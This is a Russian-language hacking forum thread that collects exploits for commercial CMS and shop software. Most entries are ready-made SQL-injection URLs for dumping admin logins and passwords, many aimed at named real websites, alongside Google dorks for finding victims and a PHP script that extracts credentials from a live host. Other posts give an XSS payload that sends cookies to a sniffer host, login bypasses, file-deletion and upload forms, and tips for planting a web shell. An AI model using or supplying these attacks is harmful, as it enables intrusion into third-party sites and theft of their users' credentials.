Анти SQL-injection (http://forum.antichat.ru/thread55520-%C0%ED%F2%E8+SQL.html)
Защита от SQL-injection (http://forum.antichat.ru/thread30641.html)
Ограничения: Нету
Эксплоит:
/article.php?es_id=-1+union+select+1,concat_ws(0x3a,es_username,es_pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15+from+esnm_a dmin/*&cid=2
Структура бд:
Table [information_schema]
Table [VIEWS]
TABLE_SCHEMA
TABLE_NAME
VIEW_DEFINITION
CHECK_OPTION
IS_UPDATABLE
DEFINER
SECURITY_TYPE
Table [alpinein_cmsalpine]
Table [es_country]
id
Table [esnm_admin]
es_username
es_password
es_level
es_blocked
Table [esnm_announcements]
es_text
es_type
es_temp
es_postedon
Table [esnm_articles]
es_title
es_sum
es_desc
es_img
es_hide
tempdate
es_date
es_postedon
es_modifiedon
es_uid
es_cid
es_top_banner
es_left_banner
es_order_index
Table [esnm_categories]
es_cat_name
es_pid
es_status
es_cat_description
es_top_banner
es_left_banner
es_order_index
Table [esnm_config]
es_site_name
es_site_root
es_html_header
es_html_footer
es_recperpage
es_image_size
es_site_keywords
es_thumb_size
es_mem_approval
es_signup_verification
es_null_char
es_admin_email
es_logincheck
es_welcome_msg
es_general_notice
Table [esnm_country]
id
Table [esnm_events]
es_title
es_desc
tempdate
es_postedon
es_approved
es_featured
Table [esnm_feedback]
es_fname
es_lname
es_email
es_url
es_title
es_comments
Table [esnm_form_fields]
es_type
es_name
es_label
es_int_value
es_req
es_display
es_width
es_num_lines
es_is_num
es_formid
es_order_index
Table [esnm_forms]
es_title
es_submit_mail
Table [esnm_front_cats]
es_cid
es_show_desc
es_rec
es_order
Table [esnm_mails]
es_mailid
es_fromid
es_title
es_subject
es_mail
es_status
es_html_format
Table [esnm_members]
es_username
es_password
es_label
es_firstname
es_lastname
es_email
es_street
es_city
es_state
es_zip
es_country
tempdate
es_ondate
es_lastlogin
es_suspended
es_phone
es_mobile
es_paid
es_general_notice
Table [esnm_pages]
es_title
es_contents
es_top_banner
es_left_banner
Table [esnm_signups]
es_rnum
es_email
es_onstamp
Table [esnm_subscribers]
es_name
es_email
Table [esnm_subscribers1]
es_name
es_email
Table [esnm_testimonials]
es_desc
es_from
tempdate
es_postedon
Пример:
prescare.org.au/article.php?es_id=-1+union+select+1,concat_ws(0x3a,es_username,es_pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15+from+esnm_a dmin/*&cid=2
InterTech WCMS SQL-injection Exploit
Оф.сайт: intertech-pal.com (http://ephpscripts.com)
Дата: 30.09.08
Первоисточник: http://www.securitylab.ru/vulnerability/360260.php (эксплоита нет)
Дорк: "Designed by: InterTech Co" id
Описание: Уязвимость существует из-за недостаточной (или ее отсутствии вовсе) фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости: проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
Анти SQL-injection (http://forum.antichat.ru/thread55520-%C0%ED%F2%E8+SQL.html)
Защита от SQL-injection (http://forum.antichat.ru/thread30641.html)
Ограничения: Нету
Эксплоит:
<?php
// Coded by ZAMUT
$host = 'www.intertech-pal.com'; # Сайт
$path = '/panorama2/'; # Путь до скрипта
$port = 80; # Порт
echo "Exploiting $host<br><br>";
$sock = fsockopen($host,$port);
if(!$sock)die("failed\n"); else echo "Connecting $host .. -OK<br><br>";
$packet = "GET http://{$host}{$path}etemplate.php?id=-1+union+select+1,2,3,concat(0x3a3a3a,username,0x3a ,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19+from+users+limit+0,1/* HTTP/1.0\r\n";
$packet.= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,";
$packet.= "application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*\r\n";
$packet.= "Accept-Language: ru\r\n";
$packet.= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.= "Proxy-Connection: Keep-Alive\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
fputs($sock,$packet);
while(!feof($sock))
{
$resp.=fgets($sock,512);
if(preg_match("/:::(.+):::/",$resp,$m)){ break; }
}
fclose($sock);
echo "Data (Username, password):<br>";
echo "$m[1]<br>";
?>
с этим адвайсом получилась странная история - после отправки строку на милворм, через 2 дня я увидел его(в урезанном виде) на милворме, но авторство принадлежало каким-то непонятным хенкерам, на что str0ke только развел руками и сказал что они прислали на день раньше. :confused: ну да не важно, все-таки выложу здесь.
================================================== ==============================
|| Xpoz SQL-INJECTION, XSS
================================================== ==============================
Application: Xpoz PRO (Expoze Photo Store)
Website: http://xpoze.org
Version: All(current 1.0)
About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.
Googledork: Powered by Powered by Xpoze.org
Date: 01-07-2008
Description:
Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS.
[ SQL-INJECTION ]
some...
http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]
http://host/video.html?limiter=0&c=1[SQL]
And other vulnerable files:
---------------------------
// $p=[admin, editor, user, photo]
[ members/$p/edite.inc ]
12: if (isset($delete)) { $ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error()); $row = mysql_fetch_assoc($ph); $url = "../photos/".$row['photo']; $thumb_url = "../thumbs/".$row['photo']; 18: mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error());
187(171 or 163): $ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());
[ members/$p/editp.inc ]
$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());
[ include/img.rating.php ]
$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error()); $rates = mysql_num_rows($rat);
ETC...
===>>> Exploit:
http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20 users%20limit%203,1/*
(!) Пароль в БД в открытом виде (!)
[ ACTIVE XSS ]
В форуме отсутствует фильтрация полей темы и сообщения.
===>>> Exploit:
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
[ PASSIVE XSS :) ]
http://host/?tpl=[XSS]
PHPInfo - http://host/info.php
aka PSIH
15.12.2008, 15:02
Absolute shopping cart
Сайт: http://www.absoluteshoppingcart.co.uk (http://www.absoluteshoppingcart.co.uk/)
Цена: от £19.99
------
SQL-Injection
http://victim.com/latest_detail.asp?prod_id=147&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
prod_id должен быть реальным..
shop-script 1.24
скрипт - один из самых распрастраненых движков интернет магазина. сейчас сняли с продажи, так как запустили новый скрипт. но shop-script 'ом все еще активно пользуются и не спешат переходить на новый продукт.
magic_quotes_gpc = OFF
Sql Injection:
проверка на уязвимость:
http://fanataudio.ru/cart.php?add2cart=120000%23'+OR+ascii(substring((s elect+Login+from+SS_customers+where+customerID%3D1 )%2C1%2C1))>0+and+''%3D'
если товар (любой) добавился то сайт уязвим
уязвимая переменная add2cart
так как поля не выводятся то вытащить пароль админа можно перебором по буковке.
пароль зашифрован base64 тоесть открыт
логин не зашифрован, в 99.9% админ это юсер с customerID=1
и в 80% его логин admin
google: inurl:"index.php?feedback=yes"
примерно 1500 сайтов
приведен реальный пример уязвимого сайта
кстати для тех кто взламал логин/пароль магазина: добавить шелл можно через добавление нового товара. просто указываете что товар является програмой. в путь выбираете любой файл шелла
не забудьте перед тем как добавить шелл залить файл .htaccess со значением Allow from all
Post Affiliate Pro
Версия: 3.0.6 и более ранние
Дорк: inurl:affiliates intext:"version 3.0." "generated in" "DB Requests"
Уязвимый код:
/affiliate/include/Affiliate/Merchants/Views/ResourceBrowser.class.php:
function process() {
if(!empty($_REQUEST['action'])) {
switch($_REQUEST['action']) {
case 'addheader':
$this->processAddHeader();
break;
/**/
}
}
function processAddHeader() {
if($_REQUEST['commited'] == 'yes') {
$name = $_REQUEST['header_name'];
$caption = $_REQUEST['header_caption'];
if(!empty($name) && !empty($caption)) {
$this->menu->createMenuHeader($name, $caption);
$this->menu->save();
return true;
} /**/
}
/affiliate/include/QUnit/UI/Menu.class.php
function createMenuHeader($name, $caption) {
if($caption != '') eval("\$caption = $caption;");
/**/
}
Эксплоит:
/affiliate/merchants/styles.php?md=Affiliate_Merchants_Views_ResourceBr owser&action=addheader&commited=yes&header_name=lolol&header_caption=phpinfo()
baltazar
11.01.2009, 02:32
Citrix NetScaler v.7
Уязвимый Файл: generic_api_call.pl
XSS:
http://site/ws/generic_api_call.pl?function=statns&stan
dalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
Iceangel_
11.01.2009, 21:39
Продукт: ArticleLive (Interspire Website Publisher)
Версия: NX.1.7.1.2(возможно и более ранние версии)
Веб-сайт разработчика:http://www.interspire.com/
Цена:$249
Уязвимый скрипт:blogs.php?id={SQL-injection}
Пример:
http://www.journalismproject.ca/english_new/blogs.php?id=-768+union+select+1,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21 ,22,23,24,25,26,27+from+ArticleLive_users+limit+0, 1--
(c) IceAngel_
DMXReady Scripts
http://www.dmxready.com
Уязвимость: Remote Files Delete Vulnerability
Продукт: DMXReady Blog Manager <= 1.1
Цена: 199.97 $
Dork : inurl:inc_webblogmanager.asp
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ajann Exp</title>
</head>
<body>
<p>Delete File : )</p>
<p>Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=</p>
<form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=">
<label>
<input type="hidden" name="inpCurrFolder" value="" />
</label>
<p>
<label>
Delete File Path:
<input type="text" name="inpFileToDelete" value="/shots/index.asp">
</label>
etc..
</p>
<p>
<label>
<input type="submit" name="ff" id="ff" value="Submit" />
</label>
</p>
</form>
<p><br />
</p>
</body>
</html>
Уязвимость: Contents Change Vulnerability
Продукт: DMXReady PayPal Store Manager <= 1.1
Цена: 129.97 $
Dork: inurl:inc_paypalstoremanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/PayPalStoreManager/inc_paypalstoremanager.asp
Edit -> http://[target]/[path]//admin/PayPalStoreManager/CategoryManager/list.asp
Продукт: DMXReady Photo Gallery Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_photogallerymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/PhotoGalleryManager/inc_photogallerymanager.asp
Edit -> http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp
Продукт: DMXReady Registration Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_registrationmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp
Продукт: DMXReady BillboardManager <= 1.1
Цена: 49.97 $
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/BillboardManager/
Edit ->
http://www.demo.dmxready.com/admin/BillboardManager/add_category.asp
Уязвимость: Remote Contents Change Vulnerability
Продукт: DMXReady Catalog Manager <= 1.1
Цена: 149.97 $
Dork: inurl:inc_catalogmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp
Продукт: DMXReady Contact Us Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_contactusmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/ContactUsManager/inc_contactusmanager.asp
Edit -> http://[target]/[path]//admin/ContactUsManager/add_category.asp
Продукт: DMXReady Document Library Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_documentlibrarymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/DocumentLibraryManager/inc_documentlibrarymanager.asp
Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.asp
Продукт: DMXReady Faqs Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_faqsmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/FaqsManager/inc_faqsmanager.asp
Edit -> http://[target]/[path]//admin/FaqsManager/add_category.asp
Продукт: DMXReady Job Listing <= 1.1
Цена: 49.97 $
Dork: inurl:inc_joblistingmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/JobListingManager/inc_joblistingmanager.asp
Edit -> http://[target]/[path]//admin/JobListingManager/CategoryManager/list.asp
Продукт: DMXReady Links Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_linksmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/LinksManager/inc_linksmanager.asp
Edit -> http://[target]/[path]//admin/LinksManager/add_category.asp
Уязвимость: SQL Injection Vulnerability
Продукт: DMXReady Classified Listings Manager <= 1.1
Цена: 99.97 $
Dork: inurl:inc_classifiedlistingsmanager.asp
Admin Login: http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp
USERNAME->
http://[target]/[path]/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config
PASSWORD->
http://[target]/[path]///admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
Продукт: DMXReady Member Directory Manager <= 1.1
Цена:99.97 $
Dork: inurl:inc_memberdirectorymanager.asp
Admin Login: http://[target]/[path]/admin/MemberDirectoryManager/admin.asp
USERNAME->
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config
PASSWORD->
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config
Продукт: DMXReady Members Area Manager <= 1.2
Цена: 149.97 $
Dork: inurl:inc_membersareamanager.asp
Admin Login: http://[target]/[path]/admin/MembersAreaManager/admin.asp
USERNAME->
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminUserName,3,4,5,6 from tblConfig
PASSWORD->
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminPassword,3,4,5,6 from tblConfig
Продукт: DMXReady SDK <= 1.1
Уязвимость: Remote File Download Vulnerability
Цена:389.97 $
http://[target]/path/control_panel/download_link.asp?filename=inc_faqsmanager_qs_jump _menu.asp&filelocation={FILE PATH}
Продукт: DMXReady Secure Document Library <= 1.1
Уязвимость: Remote SQL Injection Vulnerability
Цена:189.97 $
Admin Login:http://[target]/[path]/admin/SecureDocumentLibrary/admin.asp
USERNAME->
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
PASSWORD->
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
Продукт: DMXReady Billboard Manager <= 1.1
Уязвимость: Remote File Upload Vulnerability
Цена:49.97 $
Dork: inurl:inc_billboardmanager.asp?ItemID=
# http://[target]/[path]/admin/BillboardManager/upload_document.asp?ItemID=[ItemID]
ItemID= 1,2,3,4,5.......
Example:
You Find -> http://[target]/[path]//applications/BillboardManager/inc_billboardmanager.asp
Edit -> http://[target]/[path]//admin/BillboardManager/upload_document.asp?ItemID=[ItemID]
DMXReady BillboardManager <= 1.1 Contents Change Vulnerability find by x0r
all other vulnerability found by ajann
Сайт разработчика: http://www.sbuilder.ru
Уязвимые версии: тестировалось на версии 3.7, но, вероятно, уязвимость присутствует и в следующих версиях.
Описание:
Движок этой cms создает файлы сайта (index.php, etc) с кодом вида:
<?php if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = ''; ?>
// ...
<?php
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
// ...
?>
// ...При register_globals = On, можно записать собственный путь в переменную binn_include_path, и провести атаку LFI или RFI (при allow_url_fopen=On), в случае с LFI, отрезав добавляемый в include_once() путь при помощи null-byte или php path truncation attack.
Кактус CMS
Сайт: http://cms.kaktus.kiev.ua/
SQL-injection
Уязвимый код:
gal_pages.php
. . .
$id_group = $_REQUEST['g'];
if ( $id_group != "" )
{
$wheregroup = " AND ig.id_group=".$id_group;
}
if ( !( $count = mysql_query( "\n\t\t\t\tSELECT COUNT(g.id_image)\n\t\t\t\t\tFROM gallery g\n\t\t\t\t\t\tLEFT JOIN gallery_itemgroups ig\n\t\t\t\t\t\tON ig.id_image=g.id_image\n\t\t\t\t\t\tLEFT JOIN gallery_groups gg\n\t\t\t\t\t\tON gg.id_group=ig.id_group\n\t\t\t\tWHERE 1=1 ".$wheregroup." AND (gg.id_group IS NULL OR gg.active='1')\n\t\t" ) ) )
{
exit( mysql_error( ) );
}
$count = mysql_fetch_row( $count );
. . .
Эксплуатация:
site.com/gallery?g=10+and+substring(version(),1,1)=5--+
Аналогично в модуле Новости
Уязвимый код:
news_pages.php
. . .
$id_group = $_REQUEST['g'];
if ( $id_group != "" )
{
$wheregroup = " AND n.id_group=".$id_group;
}
. . .
$count = mysql_queryresultfield( "\n\t\t\t\tSELECT COUNT(id_news)\n\t\t\t\tFROM news n\n\t\t\t\t\tLEFT JOIN news_groups ng\n\t\t\t\t\tON ng.id_group=n.id_group\n\t\t\t\t\tLEFT JOIN core_lang_varchar l\n\t\t\t\t\tON l.id=n.id_title AND l.lang=".LANG.( "\t\t\t\t\t\n\t\t\t\tWHERE l.value<>'' AND n.kind=".$kind." {$wheregroup} AND (n.id_group IS NULL OR ng.active='1') {$monthfilter}\n\t\t" ) );
Эксплуатация:
site.com/news?g=10+and+substring(version(),1,1)=5--+
Zestos CMS
homepage:http://www.netsitecms.co.uk/
Цена - Zestos CMS perpetual license £4,750 (?7,125)
Пока не заплатишь не получишь. Поэтому и нет уязвимого кода((
Sql-inj Example:
http://www.bim-online.com/playmovie.php?contid=-40+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10/*
Админка: /admin/
Так как нет сорцов - неизвестно название таблицы с юзерами, и разные мелочи...
На домашней странице внизу любезно предоставлены клиенты этой конторы :rolleyes:
Среди них Банк Ирландии какой-то.
SiteWorks Professional
Версия: 5.0 и более ранние
Дорк: "Powered By SiteWorksPro"
Доступ в админку:
/admin/
Login: admin' or 1=1-- -
Выполнение кода:
/admin/setup.php
Site name: {${eval('phpinfo();')}}
SMS-PARTNERS CMS
http://demo.sms-partners.ru/page-contacts/%3E'%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
sql-injection in PHPKB 1.5 # старые версии 1.5, в новых багу пропатчили но версию не сменили
Online Knowledgebase Builder System
target/admin
login: admin' or 1=1/*
pass: fackthemall
пример:
panther.hartnell.edu/faqs/admin/
HAXTA4OK
10.09.2009, 20:57
PromoCMS
ТИЦ: 150
PR: 0
site : http://www.promopx.ru/
result :
http://www.promopx.ru/portfolio/category.php?branch=17&service=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--
5.0.22:promopx@localhost:promopx-rus_db
копать колонки тут смысла не видел , так как бэйсик авторизация
PS пытал счастье, но облом, пытайте счастье :) если хотите
CustomCMS (CCMS)
Цена: ~55 $
Активная XSS
/inbox.html
В теле письма "><script>alert();</script>
/notepad.html
</textarea><script>alert(document.cookie);</script>
/index.php?page=Edit+Profile
Уязвимы все поля
"><script>alert();</script>
/newthread-1.html
В Title
<script>alert();</script>
Пассивные XSS
/pm.php?action=Send&rec=1"><script>alert();</script>
/gamesearch.html
в поле Search "><script>alert();</script>
/index.php?page=Articles&action=showarticle&id="><script>alert();</script>
SQL Инъекции:
/link.php?id=-1'+unIon+select+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),version(),database()),9,10,11+--+
Будет 404
У меня например вывелось.
Forbidden
You don't have permission to access /root@localhost:5.0.45-community-nt:cccms on this server.
/ad_out.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10/*
6 Поле делат редирект.
/index.php?page=Files&action=showfile&id=1'+union+select+1,2,3,concat_ws(0x3a,user(),ver sion(),database()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26/*
/index.php?page=Companies&action=show&t=Agetec'+union+select+1,concat_ws(0x3a,user(),ver sion(),database()),3,4,5,6,7,8+--+
Раскрытие путей
/thumbnailer.php?type[]=avatar
Выполнение произвольного кода через админку:
/admincp/index.php?page=Settings&op=Templates&action=edit&file=company.php
/templates/company.php?shell=phpinfo();
PS
Боже мой...
(с) Ctacok Специально для Antichat.ru
[1] Управление -> Скрипты -> Добавить скрипт:
Название: test
Описание: test
Содержимое: <?phpinfo();?>
Сохранить
[2] Страницы и структура -> Выбираем страницу (предположим что это будет "Новости") -> Выбираем поле (кликаем на него) и выбираем модуль Скрипты (кликаем на него) и жмем Добавить модуль -> Сохранить
Переходим на ту страницу куда добавили модуль (предположим что это будет "Новости").
Twin $park
17.11.2009, 19:32
Saitika CMS
http://saitika.ru/
Blind SQL inj
news_see.php?r=1&id=1[SQL]
Конкретный пример:
http://pack4.saitika.ru/news_see.php?r=258&id=14+and+substring(@@version,1,1)=5
-------------------------------------------------------------------
Site edit CMS
http://siteedit.ru/
Passive XSS
http://free.siteedit.ru/new/?lang=>=''/<script>alert(/xss,xss/)</script>
-------------------------------------------------------------------
(с) Twin $park
Twin $park
23.11.2009, 01:33
CMS I-market
http://www.i-market.ru/
Blind SQL inj
/articles/?id=1[SQL]
пример: http://www.vip-saynu.ru/articles/?id=2+and+substring(@@version,1,1)=4
(с) Twin $park
Twin $park
17.12.2009, 17:04
D.S CMS
http://demo.smolovich.ru/ фиксированная цена отсутствует
SQL inj
admin/?dir=page_block_map&BLOCK_ID=SQL
/?pg=SQL
пример: http://demo.smolovich.ru//?pg=7&n14=4%27+union+select+1,2,3,4,5,6,7/*
XSS
//?pg=XSS
(с) Twin $park
Twin $park
28.12.2009, 22:49
Laderett CMS
http://www.lederett.de/
SQL inj
паример:
http://www.lederett.de/_rubric/detail.php?nr=103+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5,6,7,8,9,10,11,12, 13+limit+1,1/*
XSS
http://www.lederett.de/_rubric/detail.php?nr=<script>alert(/xss/)</script>
(с) Twin $park
Product: Armixcms
Author: armixcms.ru
Blind-SQL?
http://www.armixcms.ru/?id=25'+and+1=1/*
http://www.armixcms.ru/?id=25%27+and+if%28substring%28version%28%29,1,1%2 9=5,1,0%29+--+
логика срабатывает,но при попытке подбора столбцов,я уперся в 0.Мои запросы тупо игнорировались.Если ктотоподберет столбцы,милости прошу в лс,отредактирую сообщение с вашими копирайтами.
Спасибо ElteRUS.раскручиваеться как слепая.
http://www.armixcms.ru/?id=25'+and+if(ascii(substring((select+table_name+ from+information_schema.columns+where+column_name+ like+0x257061737325+limit+0,1),3,1))=116,1,0)--+
- "CMS MYSITE"
Дорк:
"на базе CMS MYSITE", "Результати 1 – 10 з приблизно 228 000 на запит "на базе CMS MYSITE". (0,31 сек)"
==================================================
Уязвимость: sqli - из-за недостаточной фильтрации данных в параметре cid
Выбераем любой сайт, и проверяем его наличие...
http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_website,2+from+inform_users+w here+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
Получаем логин...
http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+username,2+from+inform_users+where +user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
Получаем пароль, расшифровуем (обычный md5)...
http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_password,2+from+inform_users+ where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
Логинимся...
http://lookmy.info/portal/modules.php?name=Your_Account
Ещё способы получить пароли к сайтам.
==================================================
Уязвимость: SQLinj - из-за недостаточной фильтрации данных в параметрах gid, pid в модуле фотоальбома
Принцип практически тот же..
http://www.vfs.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+whe re+user_website+LIKE+0x2575626225+LIMIT+0,1--+
Уязвимость: SQLinj - из-за недостаточной фильтрации данных в пост параметрах price_from, price_to, htlNfrom, htlNto, datePlusMinus в модуле поиска.
Вот один из параметров
http://tour.lookmy.info/index.php?id=3815&show=14071
resortsToShow=all&countryKey=all&cityKey=all&CatHot=all&price_from=0+or+(select+count(*)+from+information_ schema.tables+group+by+concat(version(),floor(rand (0)*2)))&price_to=10000&day=12&mon=02&year=2010&datePlusMinus=2&htlNfrom=7&htlNto=15&roomNA=1&roomNC=0&htlBK=all&showRows=30+&btn_find=%CF%EE%E8%F1%EA%21
Создать сайт можно впринципе бесплатно. Но все модули для него платные, потому и поместил его в "платные".
(c)v1d0q
- "Stress web 8.0" - платная cms для MMORPG Lineage2
Дорк:
Результати 1 – 10 з приблизно 4 800 на запит inurl:"index.php?f=forget". (0,06 сек)
Особенность:
Magic_quotes_gpc = off
Один из способов узнать версию, если папка install не удалена - /install/license.lic
==================================================
Уязвимость: sqli - из-за недостаточной фильтрации данных в параметр step2. Файл forget.php
Фильтр
function safe($sql)
{
if ($this->mysql_link)
return mysql_real_escape_string($sql, $this->mysql_link);
else
return mysql_escape_string($sql);
}
Первый шаг
elseif (isset($_POST["submit_lost"]) && isset($_POST["step1"]))
{
if ($_POST["l2sec_code"] != $_SESSION["sw_captcha"] or !$_SESSION["sw_captcha"])
{
$error_lost = "<div class='error'>Обнаружены следующие ошибки:<br>Код безопасности не соответствует отображённому.</div>";
}
else
{
$_SESSION["sw_captcha"] = false;
$lost_l2login = $ldb->safe($_POST["lost_l2login"]);
$sel_question = $ldb->query("SELECT `l2question` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1");
Второй шаг
elseif (isset($_POST["submit_lost"]) && isset($_POST["step2"]))
{
$lost_l2answer = $_POST["lost_l2answer"];
$lost_l2login = $_POST["step2"];
list($lost_l2answer_db, $_l2email) = $ldb->fetch_array($ldb->query("SELECT `l2answer`,`l2email` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1"));
if ($lost_l2answer != $lost_l2answer_db)
{
$error_lost = "<div class='error'>Обнаружены следующие ошибки:<br>Ответ на секретный вопрос не верный!</div>";
}
Как видим, в post параметре step2 (второй шаг формы "забыли пароль"), не фильтруется логин участника, из-за чего и имеем данную уязвимость. Как эксплуатировать? Я думаю разберётесь ;)
(c)v1d0q
Strilo4ka
15.04.2010, 14:17
DSite CMS
http://www.dsite.ru/
Компания Media Programming Group
SQL injhttp://www.ttplus.ru/index.php?id=8&div_id=-88+union+select+version(),user(),database(),@@vers ion_compile_os,5--+SQL injhttp://www.ttplus.ru/index.php?id=16&article=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+
Strilo4ka
15.04.2010, 21:02
http://www.webmotor.ru/
CMS система WebMotor
SQL inj
Класика жанра.
Пример где сработало:
http://kids-garden.ru/<tr><td><b>E-mail</b>:</td><td><input type=text name="email" class="tlog1" value=""></td></tr>
<tr><td><b>Пароль</b>:</td><td><input type=password name=password class="tlog1" value=""></td></tr>
<tr><td></td><td><input type=submit value=" Войти " class="enter_01"></td></tr>name = блабла' or 1=1--
пасс любой.
Есть вывод ошибки. Значит можна вытаскивать информацию в ошибку![query: select * from user where email= 'admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)-- ' and password = 'fg'
error: Duplicate column name '5.1.43-log'
in file: /home/kidsgarden/html/inc/auto/user.inc at line: 78]
[Feldmarschall]
09.08.2010, 18:56
Orcando CMS
XSS
http://www.orcando.de/de/search/
В поиске:
">alert(112233)
[Feldmarschall]
09.08.2010, 23:07
Update Orcando CMS
Раскрытие Пути
http://www.orcando.de/de/search/
В поиске вписываем:
[PHP]
[COLOR="#0000BB"]aaa sss ss s[COLOR="#007700"]
[Feldmarschall]
23.08.2010, 18:42
Dev4u CMS
Активная XSS
http://www.dev4u.de/cms/online-demo.php?seite_id=199
Вписываем в:
E-Mail*
Vorname*
Name*
Firma
Strasse*
PLZ*
Ort*
Telefon*
">alert('xss')
Пассивная XSS
http://www.dev4u.de/cms/faq.php?tag=Programmierkenntnisse">alert(01010)
+xss в поиске
путь: http://www.dev4u.de/sitemap.xml
[Feldmarschall]
25.09.2010, 03:55
intellisite® CMS
Passive XSS
